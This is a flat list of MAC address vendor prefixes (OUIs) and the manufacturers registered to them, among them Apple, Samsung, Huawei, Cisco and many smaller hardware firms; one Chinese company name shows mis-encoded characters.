Fiberhome Telecommunication Technologies Co.,LTD C8A2CE Oasis Media Systems LLC 58F496 Source Chain 587F57 Apple, Inc. D07C2D Leie IOT technology Co., Ltd EC64E7 MOCACARE Corporation 40862E JDM MOBILE INTERNET SOLUTION CO., LTD. C4BBEA Pakedge Device and Software Inc 988744 Wuxi Hongda Science and Technology Co.,LTD E8343E Beijing Infosec Technologies Co., LTD. 346987 zte corporation 98F428 zte corporation A4CC32 Inficomm Co., Ltd 006D52 Apple, Inc. A03299 Lenovo (Beijing) Co., Ltd. 4054E4 Wearsafe Labs Inc DC9A8E Nanjing Cocomm electronics co., LTD ACEE9E Samsung Electronics Co.,Ltd B857D8 Samsung Electronics Co.,Ltd 70BF3E Charles River Laboratories A8C87F Roqos, Inc. 3C831E CKD Corporation 90DFFB HOMERIDER SYSTEMS 305A3A ASUSTek COMPUTER INC. 2C081C OVH C08488 Finis Inc 38F557 JOLATA, INC. 54A3FA BQT Solutions (Australia)Pty Ltd 246C8A YUKAI Engineering ACC51B Zhuhai Pantum Electronics Co., Ltd. 385F66 Cisco SPVTG B844D9 Apple, Inc. 9C7A03 Ciena Corporation 5CCF7F Espressif Inc. 681295 Lupine Lighting Systems GmbH 7011AE Music Life LTD 041E7A DSPWorks 84A788 Perples AC60B6 Ericsson AB 14B370 Gigaset Digital Technology (Shenzhen) Co., Ltd. 6889C1 HUAWEI TECHNOLOGIES CO.,LTD 1C497B Gemtek Technology Co., Ltd. 2CCF58 HUAWEI TECHNOLOGIES CO.,LTD D09380 Ducere Technologies Pvt. Ltd. 68F956 Objetivos y Servicio de Valor Añadido C8A9FC Goyoo Networks Inc. FCFEC2 Invensys Controls UK Limited 689AB7 Atelier Vision Corporation 444CA8 Arista Networks 7C2BE1 Shenzhen Ferex Electrical Co.,Ltd 5031AD ABB Global Industries and Services Private Limited 143EBF zte corporation FC2FEF UTT Technologies Co., Ltd. A4C138 Telink Semiconductor (Taipei) Co. Ltd. 20F510 Codex Digital Limited A8741D PHOENIX CONTACT Electronics GmbH F09A51 Shanghai Viroyal Electronic Technology Company Limited 4CB82C Cambridge Mobile Telematics, Inc. E4A32F Shanghai Artimen Technology Co., Ltd. F4672D ShenZhen Topstar Technology Company A8D828 Ascensia Diabetes Care B869C2 Sunitec Enterprise Co., Ltd. 88CBA5 Suzhou Torchstar Intelligent Technology Co.,Ltd 7CA23E HUAWEI TECHNOLOGIES CO.,LTD 501AA5 GN Netcom A/S A48D3B Vizio, Inc 1C56FE Motorola Mobility LLC, a Lenovo Company B899B0 Cohere Technologies D85DEF Busch-Jaeger Elektro GmbH 88A2D7 HUAWEI TECHNOLOGIES CO.,LTD 00323A so-logic 809FAB Fiberhome Telecommunication Technologies Co.,LTD E00370 ShenZhen Continental Wireless Technology Co., Ltd. 046169 MEDIA GLOBAL LINKS CO., LTD. BCEB5F Fujian Beifeng Telecom Technology Co., Ltd. AC5A14 Samsung Electronics Co.,Ltd F0AB54 MITSUMI ELECTRIC CO.,LTD. 3C3178 Qolsys Inc. 08ECA9 Samsung Electronics Co.,Ltd E04B45 Hi-P Electronics Pte Ltd F46A92 SHENZHEN FAST TECHNOLOGIES CO.,LTD F0D657 ECHOSENS 9C37F4 HUAWEI TECHNOLOGIES CO.,LTD 3C4711 HUAWEI TECHNOLOGIES CO.,LTD 5CEB68 Cheerstar Technology Co., Ltd AC562C LAVA INTERNATIONAL(H.K) LIMITED FC9AFA Motus Global Inc. 14157C TOKYO COSMOS ELECTRIC CO.,LTD. 20E407 Spark srl D09DAB TCT mobile ltd 887384 Toshiba 24693E innodisk Corporation C0DC6A Qingdao Eastsoft Communication Technology Co.,LTD 24B0A9 Shanghai Mobiletek Communication Ltd. 1CC586 Absolute Acoustics 407FE0 Glory Star Technics (ShenZhen) Limited C8E130 Milkyway Group Ltd 486EFB Davit System Technology Co., Ltd. B0966C Lanbowan Technology Ltd. 1CF03E Wearhaus Inc. C43ABE Sony Mobile Communications Inc 883B8B Cheering Connection Co. Ltd. E4F939 Minxon Hotel Technology INC. 146B72 Shenzhen Fortune Ship Technology Co., Ltd. B8F080 SPS, INC. 805067 W & D TECHNOLOGY CORPORATION 78F944 Private 247656 Shanghai Net Miles Fiber Optics Technology Co., LTD. F8CFC5 Motorola Mobility LLC, a Lenovo Company A47B85 ULTIMEDIA Co Ltd, 5C5B35 Mist Systems, Inc. ECBAFE GIROPTIC 3C2C94 æ­å·žå¾·æ¾œç§‘技有é™å…¬å¸ï¼ˆHangZhou Delan Technology Co.,Ltd) 241B44 Hangzhou Tuners Electronics Co., Ltd 80A85D Osterhout Design Group ACCAAB Virtual Electric Inc 485415 NET RULES TECNOLOGIA EIRELI 7840E4 Samsung Electronics Co.,Ltd E09971 Samsung Electronics Co.,Ltd 70DA9C TECSEN 2CA2B4 Fortify Technologies, LLC 10D38A Samsung Electronics Co.,Ltd E48501 Geberit International AG 206274 Microsoft Corporation E8162B IDEO Security Co., Ltd. B47356 Hangzhou Treebear Networking Co., Ltd. 346895 Hon Hai Precision Ind. Co.,Ltd. 847303 Letv Mobile and Intelligent Information Technology (Beijing) Corporation Ltd. 3CC2E1 XINHUA CONTROL ENGINEERING CO.,LTD 8C873B Leica Camera AG 44F477 Juniper Networks 142971 NEMOA ELECTRONICS (HK) CO. LTD 78E980 RainUs Co.,Ltd E0FFF7 Softiron Inc. 3C6A9D Dexatek Technology LTD. 349E34 Evervictory Electronic Co.Ltd 700FC7 SHENZHEN IKINLOOP TECHNOLOGY CO.,LTD. BC74D7 HangZhou JuRu Technology CO.,LTD 78EB14 SHENZHEN FAST TECHNOLOGIES CO.,LTD 3C4937 ASSMANN Electronic GmbH 844464 ServerU Inc 003560 Rosen Aviation F8BC41 Rosslare Enterprises Limited 3CB792 Hitachi Maxell, Ltd., Optronics Division F8B2F3 GUANGZHOU BOSMA TECHNOLOGY CO.,LTD 28D98A Hangzhou Konke Technology Co.,Ltd. D89341 General Electric Global Research 1C9ECB Beijing Nari Smartchip Microelectronics Company Limited D48DD9 Meld Technology, Inc DCC622 BUHEUNG SYSTEM 902CC7 C-MAX Asia Limited 8870EF SC Professional Trading Co., Ltd. 94C038 Tallac Networks 6836B5 DriveScale, Inc. C40880 Shenzhen UTEPO Tech Co., Ltd. D88039 Microchip Technology Inc. 5C966A RTNET BCBC46 SKS Welding Systems GmbH 9816EC IC Intracom D062A0 China Essence Technology (Zhumadian) Co., Ltd. 90179B Nanomegas 14F893 Wuhan FiberHome Digital Technology Co.,Ltd. 582136 KMB systems, s.r.o. 800902 Keysight Technologies, Inc. 0499E6 Shenzhen Yoostar Technology Co., Ltd 70FF5C Cheerzing Communication(Xiamen)Technology Co.,Ltd 4C48DA Beijing Autelan Technology Co.,Ltd 205CFA Yangzhou ChangLian Network Technology Co,ltd. 84930C InCoax Networks Europe AB 1CA2B1 ruwido austria gmbh 384B76 AIRTAME ApS 38B1DB Hon Hai Precision Ind. Co.,Ltd. 34F6D2 Panasonic Taiwan Co.,Ltd. 307512 Sony Mobile Communications Inc 64002D Powerlinq Co., LTD B47C29 Shenzhen Guzidi Technology Co.,Ltd D48F33 Microsoft Corporation 54F876 ABB AG 34B7FD Guangzhou Younghead Electronic Technology Co.,Ltd B41780 DTI Group Ltd 489D18 Flashbay Limited 90203A BYD Precision Manufacture Co.,Ltd 80EACA Dialog Semiconductor Hellas SA 20A99B Microsoft Corporation 604826 Newbridge Technologies Int. Ltd. 38F33F TATSUNO CORPORATION D80CCF C.G.V. S.A.S. 4CBB58 Chicony Electronics Co., Ltd. A41242 NEC Platforms, Ltd. D00AAB Yokogawa Digital Computer Corporation C40006 Lipi Data Systems Ltd. 38262B UTran Technology 480C49 NAKAYO Inc 3CD9CE Eclipse WiFi 6077E2 Samsung Electronics Co.,Ltd FC1910 Samsung Electronics Co.,Ltd FC790B Hitachi High Technologies America, Inc. 6081F9 Helium Systems, Inc 8401A7 Greyware Automation Products, Inc 98F170 Murata Manufacturing Co., Ltd. 686E48 Prophet Electronic Technology Corp.,Ltd 04C991 Phistek INC. 3CA10D Samsung Electronics Co.,Ltd 646CB2 Samsung Electronics Co.,Ltd 680571 Samsung Electronics Co.,Ltd 14B484 Samsung Electronics Co.,Ltd F4C447 Coagent International Enterprise Limited C8E42F Technical Research Design and Development C4C9EC Gugaoo HK Limited 34E42A Automatic Bar Controls Inc. 3059B7 Microsoft 20A787 Bointec Taiwan Corporation Limited A0FC6E Telegrafia a.s. 2053CA Risk Technology Ltd A43D78 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 04572F Sertel Electronics UK Ltd D8977C Grey Innovation BC8D0E Nokia A49F85 Lyve Minds, Inc 78923E Nokia Corporation ACA9A0 Audioengine, Ltd. A481EE Nokia Corporation 78D66F Aristocrat Technologies Australia Pty. Ltd. 441E91 ARVIDA Intelligent Electronics TechnologyCo.,Ltd. C4626B ZPT Vigantice EC1766 Research Centre Module A0D12A AXPRO Technology Inc. 209AE9 Volacomm Co., Ltd 345D10 Wytek 6C14F7 Erhardt+Leimer GmbH B0D59D Shenzhen Zowee Technology Co., Ltd 6828BA Dejai B05706 Vallox Oy 48EE07 Silver Palm Technologies LLC 50C7BF TP-LINK TECHNOLOGIES CO.,LTD. 205A00 Coval A8A668 zte corporation 00EEBD HTC Corporation 38F708 National Resource Management, Inc. E0DB88 Open Standard Digital-IF Interface for SATCOM Systems A8BD3A UNIONMAN TECHNOLOGY CO.,LTD A824EB ZAO NPO Introtest C40E45 ACK Networks,Inc. 3C89A6 KAPELSE A46CC1 LTi REEnergy GmbH A8B9B3 ESSYS 6C09D6 Digiquest Electronics LTD 481842 Shanghai Winaas Co. Equipment Co. Ltd. 447098 MING HONG TECHNOLOGY (SHEN ZHEN) LIMITED 9CBD9D SkyDisk, Inc. 74C621 Zhejiang Hite Renewable Energy Co.,LTD D4319D Sinwatec B068B6 Hangzhou OYE Technology Co. Ltd 9C65F9 AcSiP Technology Corp. 487604 Private 2C534A Shenzhen Winyao Electronic Limited A4BBAF Lime Instruments F490CA Tensorcom E44C6C Shenzhen Guo Wei Electronic Co,. Ltd. A8574E TP-LINK TECHNOLOGIES CO.,LTD. B843E4 Vlatacom 282246 Beijing Sinoix Communication Co., LTD 48B977 PulseOn Oy 7071B3 Brain Corporation 64E625 Woxu Wireless Co., Ltd 10B713 Private 100E7E Juniper Networks 208986 zte corporation 44C56F NGN Easy Satfinder (Tianjin) Electronic Co., Ltd B898F7 Gionee Communication Equipment Co,Ltd.ShenZhen 848336 Newrun 182012 Aztech Associates Inc. B8266C ANOV France 3C300C Dewar Electronics Pty Ltd 98FFD0 Lenovo Mobile Communication Technology Ltd. A875E2 Aventura Technologies, Inc. B87AC9 Siemens Ltd. F06130 Advantage Pharmacy Services, LLC 6C3C53 SoundHawk Corp 084027 Gridstore Inc. 38BF2F Espec Corp. 44C4A9 Opticom Communication, LLC C4824E Changzhou Uchip Electronics Co., LTD. A47760 Nokia Corporation C85663 Sunflex Europe GmbH 88FED6 ShangHai WangYong Software Co., Ltd. 7C72E4 Unikey Technologies 7C2048 KoamTac 8CB7F7 Shenzhen UniStrong Science & Technology Co., Ltd 38B74D Fijowave Limited 180C14 iSonea Limited 9CA9E4 zte corporation 90F3B7 Kirisun Communications Co., Ltd. C4E92F AB Sciex A88D7B SunDroid Global limited. 3CF748 Shenzhen Linsn Technology Development Co.,Ltd B07908 Cummings Engineering E47723 zte corporation 1C63B7 OpenProducts 237 AB B4527E Sony Mobile Communications Inc 94B9B4 Aptos Technology 6C15F9 Nautronix Limited 18AA45 Fon Technology 902083 General Engine Management Systems Ltd. 14B126 Industrial Software Co D850E6 ASUSTek COMPUTER INC. DC3EF8 Nokia Corporation A49F89 Shanghai Rui Rui Communication Technology Co.Ltd. 7060DE LaVision GmbH 502E5C HTC Corporation FCFE77 Hitachi Reftechno, Inc. 70533F Alfa Instrumentos Eletronicos Ltda. 407A80 Nokia Corporation 644214 Swisscom Energy Solutions AG 0CA694 Sunitec Enterprise Co.,Ltd 184462 Riava Networks, Inc. C03580 A&R TECH D08A55 Skullcandy 344F3F IO-Power Technology Co., Ltd. 146080 zte corporation 9CBB98 Shen Zhen RND Electronic Co.,LTD 50C271 SECURETECH INC CC720F Viscount Systems Inc. 742B62 FUJITSU LIMITED 643F5F Exablaze 8C2F39 IBA Dosimetry GmbH C0A0BB D-Link International 2CCD69 Aqavi.com F45F69 Matsufu Electronics distribution Company 28A1EB ETEK TECHNOLOGY (SHENZHEN) CO.,LTD B8F828 Changshu Gaoshida Optoelectronic Technology Co. Ltd. 3C1A57 Cardiopulmonary Corp 541B5D Techno-Innov 9CE7BD Winduskorea co., Ltd 3842A6 Ingenieurbuero Stahlkopf 2C553C Gainspeed, Inc. 248000 Westcontrol AS 1C4BB9 SMG ENTERPRISE, LLC 346178 The Boeing Company 1446E4 AVISTEL D095C7 Pantech Co., Ltd. D02C45 littleBits Electronics, Inc. 044F8B Adapteva, Inc. B4A82B Histar Digital Electronics Co., Ltd. 284D92 Luminator 54FB58 WISEWARE, Lda 940BD5 Himax Technologies, Inc E0D1E6 Aliph dba Jawbone D82D9B Shenzhen G.Credit Communication Technology Co., Ltd 709BFC Bryton Inc. ACE42E SK hynix 78FE41 Socus networks 205721 Salix Technology CO., Ltd. 883612 SRC Computers, LLC 083571 CASwell INC. 9876B6 Adafruit 503CC4 Lenovo Mobile Communication Technology Ltd. 2C7B84 OOO Petr Telegin A4C0C7 ShenZhen Hitom Communication Technology Co..LTD 306112 PAV GmbH 789F4C HOERBIGER Elektronik GmbH 18104E CEDINT-UPM 9C1465 Edata Elektronik San. ve Tic. A.Åž. 4C55CC Zentri Pty Ltd 00C5DB Datatech Sistemas Digitales Avanzados SL 8CF945 Power Automation pte Ltd F842FB Yasuda Joho Co.,ltd. 887398 K2E Tekpoint 2C922C Kishu Giken Kogyou Company Ltd,. D8FEE3 D-Link International 58F387 HCCP 3C977E IPS Technology Limited A4FB8D Hangzhou Dunchong Technology Co.Ltd F4CD90 Vispiron Rotec GmbH 806C8B KAESER KOMPRESSOREN AG 043D98 ChongQing QingJia Electronics CO.,LTD E03E4A Cavanagh Group International 041B94 Host Mobility AB A0CEC8 CE LINK LIMITED 907A28 Beijing Morncloud Information And Technology Co. Ltd. 1001CA Ashley Butterworth 246AAB IT-IS International FC4BBC Sunplus Technology Co., Ltd. 50A0BF Alba Fiber Systems Inc. B836D8 Videoswitch DC6F00 Livescribe, Inc. 54E3B0 JVL Industri Elektronik 804B20 Ventilation Control 287994 Realplay Digital Technology(Shenzhen) Co.,Ltd 107A86 U&U ENGINEERING INC. 40BD9E Physio-Control, Inc 6C5779 Aclima, Inc. C0DA74 Hangzhou Sunyard Technology Co., Ltd. 18D6CF Kurth Electronic GmbH F48139 CANON INC. 1836FC Elecsys International Corporation A4D094 Erwin Peters Systemtechnik GmbH 882364 Watchnet DVR Inc 581CBD Affinegy 284FCE Liaoning Wontel Science and Technology Development Co.,Ltd. 048D38 Netcore Technology Inc. 2C9464 Cincoze Co., Ltd. 3065EC Wistron (ChongQing) 542CEA PROTECTRON 94B8C5 RuggedCom Inc. DC825B JANUS, spol. s r.o. 9CA577 Osorno Enterprises Inc. C04301 Epec Oy E07C62 Whistle Labs, Inc. F07F0C Leopold Kostal GmbH &Co. KG 4C6255 SANMINA-SCI SYSTEM DE MEXICO S.A. DE C.V. 082719 APS systems/electronic AG 505AC6 GUANGDONG SUPER TELECOM CO.,LTD. 9C79AC Suntec Software(Shanghai) Co., Ltd. 4C9614 Juniper Networks B863BC ROBOTIS, Co, Ltd 980D2E HTC Corporation C419EC Qualisys AB 604A1C SUYIN Corporation D464F7 CHENGDU USEE DIGITAL TECHNOLOGY CO., LTD 74D02B ASUSTek COMPUTER INC. 601E02 EltexAlatau E0C6B3 MilDef AB 6472D8 GooWi Technology Co.,Limited 60601F SZ DJI TECHNOLOGY CO.,LTD 5C8486 Brightsource Industries Israel LTD 50CD32 NanJing Chaoran Science & Technology Co.,Ltd. BCBAE1 AREC Inc. 18FA6F ISC applied systems corp A01C05 NIMAX TELECOM CO.,LTD. 60E00E SHINSEI ELECTRONICS CO LTD 545414 Digital RF Corea, Inc 24EB65 SAET I.S. S.r.l. D0F27F SteadyServ Technoligies, LLC E894F6 TP-LINK TECHNOLOGIES CO.,LTD. 188410 CoreTrust Inc. FC229C Han Kyung I Net Co.,Ltd. 1832A2 LAON TECHNOLOGY CO., LTD. D4A499 InView Technology Corporation 08482C Raycore Taiwan Co., LTD. DC2BCA Zera GmbH 9498A2 Shanghai LISTEN TECH.LTD E0EDC7 Shenzhen Friendcom Technology Development Co., Ltd B4DD15 ControlThings Oy Ab DC1DD4 Microstep-MIS spol. s r.o. FCDD55 Shenzhen WeWins wireless Co.,Ltd B01743 EDISON GLOBAL CIRCUITS LLC D0BE2C CNSLink Co., Ltd. 40516C Grandex International Corporation C0885B SnD Tech Co., Ltd. 3CFB96 Emcraft Systems LLC 846223 Shenzhen Coship Electronics Co., Ltd. 1CFA68 TP-LINK TECHNOLOGIES CO.,LTD. 081F3F WondaLink Inc. 1853E0 Hanyang Digitech Co.Ltd 00C14F DDL Co,.ltd. 2C26C5 zte corporation 105F06 Actiontec Electronics, Inc 087999 AIM GmbH C011A6 Fort-Telecom ltd. C04A00 TP-LINK TECHNOLOGIES CO.,LTD. 045FA7 Shenzhen Yichen Technology Development Co.,LTD 94C962 Teseq AG DC2A14 Shanghai Longjing Technology Co. 6886E7 Orbotix, Inc. C05E6F V. Stonkaus firma Kodinis Raktas C0B8B1 BitBox Ltd F82EDB RTW GmbH & Co. KG 808B5C Shenzhen Runhuicheng Technology Co., Ltd D819CE Telesquare E0CEC3 ASKEY COMPUTER CORP 38F597 home2net GmbH 807B1E Corsair Memory, Inc. B4AB2C MtM Technology Corporation 74372F Tongfang Shenzhen Cloudcomputing Technology Co.,Ltd F0219D Cal-Comp Electronics & Communications Company Ltd. 181725 Cameo Communications, Inc. 8462A6 EuroCB (Phils), Inc. E4F365 Time-O-Matic, Inc. DCC0DB Shenzhen Kaiboer Technology Co., Ltd. AC5D10 Pace Americas FC626E Beijing MDC Telecom 84C8B1 Incognito Software Systems Inc. E8A364 Signal Path International / Peachtree Audio BC51FE Swann communications Pty Ltd 88F490 Jetmobile Pte Ltd 1C9179 Integrated System Technologies Ltd A0BAB8 Pixon Imaging 74E424 APISTE CORPORATION 2411D0 Chongqing Ehs Science and Technology Development Co.,Ltd. B461FF Lumigon A/S A0A130 DLI Taiwan Branch office 30215B Shenzhen Ostar Display Electronic Co.,Ltd 34FA40 Guangzhou Robustel Technologies Co., Limited 1C5A6B Philips Electronics Nederland BV A875D6 FreeTek International Co., Ltd. ECE915 STI Ltd 80D733 QSR Automations, Inc. 303D08 GLINTT TES S.A. A81FAF KRYPTON POLSKA 30D357 Logosol, Inc. BC39A6 CSUN System Technology Co.,LTD ECB541 SHINANO E and E Co.Ltd. D410CF Huanshun Network Science and Technology Co., Ltd. 6CB311 Shenzhen Lianrui Electronics Co.,Ltd 10A743 SK Mtek Limited 547FA8 TELCO systems, s.r.o. 5474E6 Webtech Wireless C46DF1 DataGravity 304449 PLATH GmbH 94FD2E Shanghai Uniscope Technologies Co.,Ltd E4C146 Objetivos y Servicios de Valor A D40057 MC Technologies GmbH 5CE0F6 NIC.br- Nucleo de Informacao e Coordenacao do Ponto BR C83D97 Nokia Corporation 0CF361 Java Information 600F77 SilverPlus, Inc B0358D Nokia Corporation F8E4FB Actiontec Electronics, Inc 8C4AEE GIGA TMS INC 34C99D EIDOLON COMMUNICATIONS TECHNOLOGY CO. LTD. ACE64B Shenzhen Baojia Battery Technology Co., Ltd. 789F87 Siemens AG I IA PP PRM 08E5DA NANJING FUJITSU COMPUTER PRODUCTS CO.,LTD. 5884E4 IP500 Alliance e.V. 044BFF GuangZhou Hedy Digital Technology Co., Ltd E8718D Elsys Equipamentos Eletronicos Ltda D0738E DONG OH PRECISION CO., LTD. 64C944 LARK Technologies, Inc 0C93FB BNS Solutions E44F5F EDS Elektronik Destek San.Tic.Ltd.Sti E86D54 Digit Mobile Inc 90B11C Dell Inc. 005D03 Xilinx, Inc 802FDE Zurich Instruments AG 5C38E0 Shanghai Super Electronics Technology Co.,LTD 08AF78 Totus Solutions, Inc. C8C791 Zero1.tv GmbH ECD925 RAMI 1C9492 RUAG Schweiz AG B889CA ILJIN ELECTRIC Co., Ltd. 64F50E Kinion Technology Company Limited D04CC1 SINTRONES Technology Corp. 503F56 Syncmold Enterprise Corp 8CEEC6 Precepscion Pty. Ltd. 101248 ITG, Inc. 1848D8 Fastback Networks F0D3E7 Sensometrix SA B01266 Futaba-Kikaku 7CC8D0 TIANJIN YAAN TECHNOLOGY CO., LTD. 88E917 Tamaggo 88615A Siano Mobile Silicon Ltd. 70E24C SAE IT-systems GmbH & Co. KG 00FD4C NEVATEC 144319 Creative&Link Technology Limited D8AF3B Hangzhou Bigbright Integrated communications system Co.,Ltd 6032F0 Mplus technology 2829D9 GlobalBeiMing technology (Beijing)Co. Ltd 1CC316 MileSight Technology Co., Ltd. 6815D3 Zaklady Elektroniki i Mechaniki Precyzyjnej R&G S.A. 10F3DB Gridco Systems, Inc. 305D38 Beissbarth 60D2B9 REALAND BIO CO., LTD. 30FD11 MACROTECH (USA) INC. C4DA26 NOBLEX SA 7CC8AB Acro Associates, Inc. 601929 VOLTRONIC POWER TECHNOLOGY(SHENZHEN) CORP. 48B253 Marketaxess Corporation 74943D AgJunction 58CF4B Lufkin Industries 68B43A WaterFurnace International, Inc. 4C7897 Arrowhead Alarm Products Ltd 44E8A5 Myreka Technologies Sdn. Bhd. D8AFF1 Panasonic Appliances Company 2C6289 Regenersis (Glenrothes) Ltd 58ECE1 Newport Corporation 4C09B4 zte corporation 60D1AA Vishal Telecommunications Pvt Ltd 709BA5 Shenzhen Y&D Electronics Co.,LTD. F45433 Rockwell Automation B48910 Coster T.E. S.P.A. B0C83F Jiangsu Cynray IOT Co., Ltd. 3CF392 Virtualtek. Co. Ltd B482C5 Relay2, Inc. 985E1B ConversDigital Co., Ltd. D48CB5 Cisco Systems, Inc 909DE0 Newland Design + Assoc. Inc. 149FE8 Lenovo Mobile Communication Technology Ltd. BCD940 ASR Co,.Ltd. 049C62 BMT Medical Technology s.r.o. 0C2A69 electric imp, incorporated C455C2 Bach-Simpson 00E8AB Meggitt Training Systems, Inc. B4218A Dog Hunter LLC B4A4B5 Zen Eye Co.,Ltd DC37D2 Hunan HKT Electronic Technology Co., Ltd 407074 Life Technology (China) Co., Ltd 20F002 MTData Developments Pty. Ltd. 388AB7 ITC Networks BCC23A Thomson Video Networks 1CF4CA Private ACC2EC CLT INT'L IND. CORP. A865B2 DONGGUAN YISHANG ELECTRONIC TECHNOLOGY CO., LIMITED E8D0FA MKS Instruments Deutschland GmbH 98262A Applied Research Associates, Inc 3C9174 ALONG COMMUNICATION TECHNOLOGY ACEE3B 6harmonics Inc 1C6BCA Mitsunami Co., Ltd. 642400 Xorcom Ltd. E83EFB GEODESIC LTD. ECD19A Zhuhai Liming Industries Co., Ltd 348137 UNICARD SA 38B12D Sonotronic Nagel GmbH 549D85 EnerAccess inc B0750C QA Cafe B4E1EB Private 3C363D Nokia Corporation 808698 Netronics Technologies Inc. 9CE10E NCTech Ltd A06D09 Intelcan Technosystems Inc. 60F3DA Logic Way GmbH FC5090 SIMEX Sp. z o.o. 60B982 RO.VE.R. Laboratories S.p.A. B46238 Exablox C8BBD3 Embrane 8C604F Cisco Systems, Inc A4B980 Parking BOXX Inc. A47C14 ChargeStorm AB 8020AF Trade FIDES, a.s. 2C750F Shanghai Dongzhou-Lawton Communication Technology Co. Ltd. 5C5015 Cisco Systems, Inc 980284 Theobroma Systems GmbH 1CD40C Kriwan Industrie-Elektronik GmbH 002D76 TITECH GmbH F8DB4C PNY Technologies, INC. 0C9D56 Consort Controls Ltd 3CB87A Private AC1461 ATAWCo., Ltd. E4C6E6 Mophie, LLC 502D1D Nokia Corporation F48E09 Nokia Corporation 5848C0 COFLEC 8C57FD LVX Western 54E63F ShenZhen LingKeWeiEr Technology Co., Ltd. 20FABB Cambridge Executive Limited 141A51 Treetech Sistemas Digitais 587FC8 S2M 200505 RADMAX COMMUNICATION PRIVATE LIMITED C035BD Velocytech Aps 287184 Spire Payments 7CB03E OSRAM GmbH 3C9F81 Shenzhen CATIC Bit Communications Technology Co.,Ltd 445F7A Shihlin Electric & Engineering Corp. 441319 WKK TECHNOLOGY LTD. 18B591 I-Storm BC8B55 NPP ELIKS America Inc. DBA T&M Atlantic C0493D MAITRISE TECHNOLOGIQUE C84544 Asia Pacific CIS (Wuxi) Co, Ltd E0EF25 Lintes Technology Co., Ltd. 50ED94 EGATEL SL 48A22D Shenzhen Huaxuchang Telecom Technology Co.,Ltd C86000 ASUSTek COMPUTER INC. AC0DFE Ekon GmbH - myGEKKO FC5B26 MikroBits 40F407 Nintendo Co., Ltd. B01C91 Elim Co 04F17D Tarana Wireless 844915 vArmour Networks, Inc. 2CBE97 Ingenieurbuero Bickele und Buehler GmbH 70A66A Prox Dynamics AS DC3E51 Solberg & Andersen AS 900A3A PSG Plastic Service GmbH 28CD1C Espotel Oy D443A8 Changzhou Haojie Electric Co., Ltd. BCE59F WATERWORLD Technology Co.,LTD 7041B7 Edwards Lifesciences LLC DCA8CF New Spin Golf, LLC. A849A5 Lisantech Co., Ltd. A05E6B MELPER Co., Ltd. D878E5 KUHN SA D824BD Cisco Systems, Inc 3497FB ADVANCED RF TECHNOLOGIES INC F03A55 Omega Elektronik AS 98BC57 SVA TECHNOLOGIES CO.LTD DC3C2E Manufacturing System Insights, Inc. F83553 Magenta Research Ltd. F4044C ValenceTech Limited C467B5 Libratone A/S 4C3910 Newtek Electronics co., Ltd. 903AA0 Nokia B06CBF 3ality Digital Systems GmbH 54D0ED AXIM Communications 843611 hyungseul publishing networks 3440B5 IBM D4D748 Cisco Systems, Inc 344F69 EKINOPS SAS F8313E endeavour GmbH 143605 Nokia Corporation C81AFE DLOGIC GmbH EC63E5 ePBoard Design LLC 94DB49 SITCORP F0620D Shenzhen Egreat Tech Corp.,Ltd 2C67FB ShenZhen Zhengjili Electronics Co., LTD 3CE5B4 KIDASEN INDUSTRIA E COMERCIO DE ANTENAS LTDA 08D09F Cisco Systems, Inc 644BF0 CalDigit, Inc 64ED62 WOORI SYSTEMS Co., Ltd 2C002C UNOWHY 5CC9D3 PALLADIUM ENERGY ELETRONICA DA AMAZONIA LTDA C87CBC Valink Co., Ltd. B81413 Keen High Holding(HK) Ltd. B4944E WeTelecom Co., Ltd. E00B28 Inovonics 48022A B-Link Electronic Limited 18E80F Viking Electronics Inc. CC6BF1 Sound Masking Inc. 2C9717 I.C.Y. B.V. 2C3F38 Cisco Systems, Inc 4050E0 Milton Security Group LLC 70CA9B Cisco Systems, Inc A078BA Pantech Co., Ltd. 68BC0C Cisco Systems, Inc 345B11 EVI HEAT AB 78BAD0 Shinybow Technology Co. Ltd. 24E6BA JSC Zavod im. Kozitsky CCA374 Guangdong Guanglian Electronic Technology Co.Ltd 58677F Clare Controls Inc. 0C5A19 Axtion Sdn Bhd A8BD1A Honey Bee (Hong Kong) Limited 248707 SEnergy Corporation C4C19F National Oilwell Varco Instrumentation, Monitoring, and Optimization (NOV IMO) 000830 Cisco Systems, Inc C4EEAE VSS Monitoring F8D3A9 AXAN Networks BC779F SBM Co., Ltd. 406AAB RIM 9CA3BA SAKURA Internet Inc. 8C8A6E ESTUN AUTOMATION TECHNOLOY CO., LTD 988217 Disruptive Ltd 9C5C8D FIREMAX INDÚSTRIA E COMÉRCIO DE PRODUTOS ELETRÔNICOSLTDA D4206D HTC Corporation 7C1E52 Microsoft DCB4C4 Microsoft XCG ACCB09 Hefcom Metering (Pty) Ltd 1866E3 Veros Systems, Inc. 74FDA0 Compupal (Group) Corporation CCB8F1 EAGLE KINGDOM TECHNOLOGIES LIMITED A429B7 bluesky 48F317 Private CCF8F0 Xi'an HISU Multimedia Technology Co.,Ltd. 04888C Eifelwerk Butler Systeme GmbH D45AB2 Galleon Systems 30DE86 Cedac Software S.r.l. 18C451 Tucson Embedded Systems 704642 CHYNG HONG ELECTRONIC CO., LTD. D41C1C RCF S.P.A. 58920D Kinetic Avionics Limited AC02EF Comsis B8B42E Gionee Communication Equipment Co,Ltd.ShenZhen 443EB2 DEOTRON Co., LTD. D059C3 CeraMicro Technology Corporation 182C91 Concept Development, Inc. FC1794 InterCreative Co., Ltd B40B7A Brusa Elektronik AG 280CB8 Mikrosay Yazilim ve Elektronik A.S. 3CC99E Huiyang Technology Co., Ltd 2C1EEA AERODEV 1C8E8E DB Communication & Systems Co., ltd. 24EC99 ASKEY COMPUTER CORP A44B15 Sun Cupid Technology (HK) LTD 48C862 Simo Wireless,Inc. 78BEB6 Enhanced Vision 449CB5 Alcomp, Inc B4FC75 SEMA Electronics(HK) CO.,LTD B0BF99 WIZITDONGDO B82ADC EFR Europäische Funk-Rundsteuerung GmbH 40F14C ISE Europe SPRL E8944C Cogent Healthcare Systems Ltd 9067F3 Alcatel Lucent D4F0B4 Napco Security Technologies 68F895 Redflow Limited 70B921 Fiberhome Telecommunication Technologies Co.,LTD A0E295 DAT System Co.,Ltd A0165C Triteka LTD 9C417C HameTechnology Co.,Limited 9C6ABE QEES ApS. 9C934E Xerox Corporation 044665 Murata Manufacturing Co., Ltd. 2C2172 Juniper Networks 900917 Far-sighted mobile 2C8BF2 Hitachi Metals America Ltd D8973B Artesyn Embedded Technologies 3826CD ANDTEK 88BFD5 Simple Audio Ltd 24CBE7 MYK, Inc. B0A10A Pivotal Systems Corporation 802DE1 Solarbridge Technologies F4A52A Hawa Technologies Inc 0C6E4F PrimeVOLT Co., Ltd. 